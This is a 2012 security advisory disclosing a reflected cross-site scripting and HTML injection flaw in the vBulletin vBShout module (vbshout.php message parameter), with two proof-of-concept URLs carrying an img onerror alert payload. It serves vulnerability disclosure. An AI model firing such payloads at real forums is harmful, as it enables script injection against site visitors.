vBulletin vBShout 6.0.5 Cross Site Scripting

2012-03-24T00:00:00
ID PACKETSTORM:111160
Type packetstorm
Reporter d3v1l
Modified 2012-03-24T00:00:00

Description

`###############################################################################################################
  
  
# Title: vBulletin vBShout Module <= 6.0.5 (vbshout.php?message=) - Reflected Cross-Site Scripting (XSS)
  
# Note: HTML Injection and Redirect works too  
  
# Script Page : http://www.dragonbyte-tech.com  
  
# Date: 24-03-2012  
  
# Author : Avram Marius Gabriel (d3v1l)  
  
# RandomStorm - http://www.randomstorm.com  
  
# Tested on: Windows XP & Vista  
  
  
###############################################################################################################  
  
  
# The latest version of the vBulletin vBShout Module suffers from Cross-Site Scripting and HTML Injection.
The issue is located in the Shoutbox Search Archive (the message parameter of vbshout.php).
  
# POC:  
  
# http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img src=1 onerror=alert("XSS")>&username=&hours=&from[month]=0&from[day]=&from[year]=0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1
  
  
# http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img src=1 onerror=alert("XSS")>&s=&do=archive&instanceid=1
  
  
################################################################################################################  
  
  
  
# vBShout is the ideal way to keep members on your forum while they wait for replies to their posts.
It can be used in many ways - as a chat room for members, for staff to discuss issues in realtime,
as a live-update feed of new posts and threads, and as a way to track member milestones.
  
################################################################################################################  
  
--
Check My Blog <http://security-sh3ll.blogspot.com> or Follow me on Twitter <http://twitter.com/securityshell>
`